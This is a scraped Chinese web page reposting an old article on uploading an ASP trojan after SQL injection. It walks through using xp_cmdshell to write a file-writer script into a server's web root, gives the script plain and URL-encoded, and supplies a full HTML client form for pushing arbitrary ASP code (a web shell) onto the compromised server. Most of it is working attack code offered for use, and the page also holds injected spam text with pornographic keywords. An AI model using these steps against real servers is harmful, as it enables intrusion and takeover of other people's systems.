• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  • 

    
  
    
     
  
    
  
    
 
      劉慈欣談ChatGPT:人類的無能反而 劉慈欣談ChatGPT:人類的無能反而  
    

      OpenAI 因使用“竊取”的個人數據 OpenAI 因使用“竊取”的個人數據  
    

      搜狐回應員工遭遇工資補助詐騙: 搜狐回應員工遭遇工資補助詐騙:  
    

    
    
    
                   
    
    
  
    
  
    
    
    
  
    
  
    
    
    
      
    
        
    
          
    
          軟件測試 > 測試開發技術 > 軟件測試開發語言 > 數據庫 > 
         
    
        
    
        
    
          
                   
    
        
    
      
    
    
    
  
    
  
    
    
    
  
    
  
    
    
    
      
    
        
    
           
    SQL注入與ASP木馬上傳
    
              
    發表于:2007-05-25來源:作者:點擊數:
              標簽:sql上傳注入木馬asp
              
    
              
    
                SQL 注入后,如何上傳木馬,一直是比較頭疼的事,我這里提供上傳木馬的一種另一種方法。 1、SQL注入的時候,用xp_cmdshell 向服務器上寫入一個能寫文件的asp文件。 文件內容: % Set objFSO = Server.createObject(Scripting.FileSystemObject) Set objCount
              
    
                      
            
          SQL注入后,如何上傳木馬,一直是比較頭疼的事,我這里提供上傳木馬的一種另一種方法。
    1、SQL注入的時候,用xp_cmdshell 向服務器上寫入一個能寫文件的asp文件。
    文件內容:
    <%
    Set objFSO = Server.createObject("Scripting.FileSystemObject")
    Set objCountFile=objFSO.createTextFile(request("mypath"),True)
    objCountFile.Write request("mydata")
    objCountFile.Close
    %>
    這個文件可以寫成一行 <%Set objFSO = Server.createObject("Scripting.FileSystemObject"):Set objCountFile=objFSO.createTextFile(request("mypath"),True):objCountFile.Write request("mydata"):objCountFile.Close%>

    將特殊字符進行編碼 就可以得到 
    %3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E


    注入(這里假定web目錄是C:\.netpub\wwwroot\): 
    exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > C:\Inetpub\wwwroot\ftp.asp';


    這樣 在服務器的web 目錄下 將生成一個 ftp.asp文件
    該文件的代碼為
    <%
    Set objFSO = Server.createObject("Scripting.FileSystemObject")
    Set objCountFile=objFSO.createTextFile(request("mypath"),True)
    objCountFile.Write request("mydata")
    objCountFile.Close
    %>


    你可以看到,上面代碼中預留了兩個接口 mypath 和 mydata

    mypath是下次提交的時候 文件的生成路徑
    mydata是文件的內容

    在本地編寫一個客戶端文件 例:RohuClient.htm 代碼如下
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title>肉雞文件生成器--客戶端 制作:絕對零度 QQ:12216796</title>
    <style type="text/css">
    <!--
    TD {
    FONT-SIZE: 9pt; LINE-HEIGHT: 150%
    }
    BODY {
    FONT-SIZE: 12px;
    FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋體;
    SCROLLBAR-FACE-COLOR: #eeeeee; 
    SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; 
    SCROLLBAR-SHADOW-COLOR: #dee3e7; 
    SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; 
    SCROLLBAR-ARROW-COLOR: #006699; 
    SCROLLBAR-TRACK-COLOR: #ededed; 
    SCROLLBAR-DARKSHADOW-COLOR: #98aab1
    }

    A:link {
    FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
    }
    A:visited {
    FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
    }
    A:hover {
    COLOR: #clearcase/" target="_blank" >cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline
    }
    input,select,TEXTAREA {
    font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋體";
    background-color: #f9f9f9; 
    font-size: 9pt ; 
    border: 1px #d2d2d2 dobble;
    line-height:120%;
    }

    -->
    </style>
    </head>
    <script language="javascript" type="text/javascript">
    function chk(theform)
    {
    if(theform.ftpUrl.value=='')
    {
    alert('請輸入遞交的地址!');
    theform.ftpUrl.focus();
    return false;
    }
    if(theform.MyPath.value=='')
    {
    alert('請輸入生成文件的位置!');
    theform.MyPath.focus();
    return false;
    }
    if(theform.MyData.value=='')
    {
    alert('請輸入生成文件的內容!');
    theform.MyData.focus();
    return false;
    }
    theform.action=theform.ftpUrl.value;
    }
    </script>
    <body>
    <form name="RohuForm" method="post" action="" onSubmit="return chk(this)" target="_blank">
    <table width="673" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
    <td width="11%">目標位置:</td>
    <td width="79%"><input name="ftpUrl" type="text" id="ftpUrl" size="50">
    例:http://127.0.0.1/FTP.ASP<;/td>
    </tr>
    <tr>
    <td>生成文件:</td>
    <td><input name="MyPath" type="text" id="MyPath">
    將在服務器上,生成的文件路徑。例:
    C:\Inetpub\wwwroot\Server.asp </td>
    </tr>
    <tr>
    <td valign="top">文件代碼:</td>
    <td><textarea name="MyData" cols="100" rows="10" id="textarea"></textarea></td>
    </tr>
    <tr>
    <td> </td>
    <td><input type="submit" name="Submit" value="提交"></td>
    </tr>
    </table>
    <br>
    </form>
    <table width="100%" border="0" cellspacing="0" cellpadding="0">
    <tr>
    <td align="center">版權所有:絕對零度(<a href="http://www.rohu.com";>虎盟</a>)</td>
    </tr>
    </table>
    </body>
    </html>



    在目標位置欄填上剛剛生成的ftp.asp文件的url地址 
    http://127.0.0.1/ftp.asp (這里假設服務器的ip是 127.0.0.1)
    在生成文件欄 輸入將在服務器上生成的文件名 比如:C:\Inetpub\wwwroot\Server.asp 
    在文件內容里 ,隨意的粘貼一個asp代碼 
    點遞交,當http://127.0.0.1/ftp.asp 文件執行完畢 基本上服務器上的asp木馬就生成了。

    瀏覽 http://127.0.0.1/Server.ASP 呵呵 服務器就是你的了

    Hoky: 這篇文章前段時間不知道在那個地方看過.轉貼的時候就沒有寫作者是誰.我也不記得了.
    

    

	
	

  



           
    原文轉自:http://www.kjueaiud.com
    
           
    
  
    


    
           
          
    
            
      
              
            
    
          
    
         
          
 
    
           

          
    

          
        
    
      
    
    
    
   
   
    
      
    
        
    
          
     相關文章
    
        
    
        
    
          
        
    
        
    
       
	   
	   
	   
  
    
   
          
                   
    
         
   
  
    




    
        
      
    
      
    
        
    
          
     軟件測試沙龍 More>> 
    
        
    
        
     
        
        
        
        
    
      
    
      
    
        
    
          
     新浪微博More>>
    
        
    
        
    
          
        
    
      
    
      ...
      
    
          
     熱門標簽 
    
        
    
        
    
          
          
    
            
             
      
              
      • 
              
      • 
            
    
          
    
        
    
      
    
  
    

    
    
    
      
    
    
  
    

    


老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

    • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  •